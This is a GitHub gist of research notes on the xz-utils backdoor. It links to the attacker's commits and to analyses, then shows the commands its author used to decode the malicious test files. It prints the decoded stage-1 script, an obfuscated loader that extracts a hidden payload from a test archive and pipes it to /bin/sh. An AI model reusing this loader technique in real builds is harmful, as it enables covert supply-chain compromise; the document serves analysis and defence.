Last active
April 6, 2024 17:23
-
-
Save Akanoa/2dc95d505790456f2c5efc9def109cbc to your computer and use it in GitHub Desktop.
a lot of resources about xz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// patch security note by JiaT75 itself | |
https://salsa.debian.org/debian/xz-utils/-/blame/b43c3e48bf6097095eef36d44cdbec811074940a/.github/SECURITY.md#L12 | |
// patch m4 file on sid debian | |
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L63 | |
// backport 5.6.0 | |
https://salsa.debian.org/debian/xz-utils/-/commit/12388833e66a4ddafe08571882ad638a511cf68b?page=10#71e626f2c3f59e8b311f7777379f651145fda3d3 | |
// read payload stage 0 -> stage 1 | |
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L95 | |
// build to host patch | |
https://www.diffchecker.com/DxS4Wz01/ | |
// xz bot | |
https://github.com/amlweems/xzbot | |
// target only x86_64 arch | |
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L29 | |
// target only GNU linker | |
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L51 | |
// reverse double obfuscated payload | |
https://gynvael.coldwind.pl/?lang=en&id=782 | |
// payloads | |
https://git.tukaani.org/?p=xz.git;a=commit;h=6e636819e8f070330d835fce46289a3ff72a7b89 | |
// xz-scripts | |
https://research.swtch.com/xz-script | |
// file rename (delay the attack?9) | |
https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea | |
// reverse | |
// remap symbols | |
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" > bad-3-corrupt_lzma2_remap.xz | |
// diff binary | |
❯ diff <(xxd tests_files_bad-3-corrupt_lzma2.xz) <(xxd bad-3-corrupt_lzma2_remap.xz) | |
7,8c7,8 | |
< 00000060: e005 1601 5f5d 0005 20a5 2d55 bb98 047c ...._].. .-U...| | |
< 00000070: c699 bca0 664d cd31 ad0b 2920 b828 0c2e ....fM.1..) .(.. | |
--- | |
> 00000060: e005 1601 2d5d 0005 09a5 5f55 bb98 047c ....-]...._U...| | |
> 00000070: c699 bca0 664d cd31 ad0b 2909 b828 0c2e ....fM.1..)..(.. | |
12c12 | |
< 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f2d .I.`?......[.a.- | |
--- | |
> 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f5f .I.`?......[.a._ | |
18,19c18,19 | |
< 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 09ac 2a24 n..).l.X.w,(..*$ | |
< 00000120: 1320 1921 7c03 4a30 b202 1898 d120 2034 . .!|.J0..... 4 | |
--- | |
> 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 20ac 2a24 n..).l.X.w,( .*$ | |
> 00000120: 1309 1921 7c03 4a30 b202 1898 d109 0934 ...!|.J0.......4 | |
// real stage 1 | |
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d | |
####Hello#### | |
#�U��$� | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
[ ! $(uname) = "Linux" ] && exit 0 | |
eval `grep ^srcdir= config.status` | |
if test -f ../../config.status;then | |
eval `grep ^srcdir= ../../config.status` | |
srcdir="../../$srcdir" | |
fi | |
// discard 1ko, takes 2ko, discard 1ko, ... , takes 939 o | |
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh | |
####World#### | |
// get the stage 2 payload | |
./take_relevant-step3.sh | |
xz -F raw --lzma1 -dc good-large_uncompressed_remap.bi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment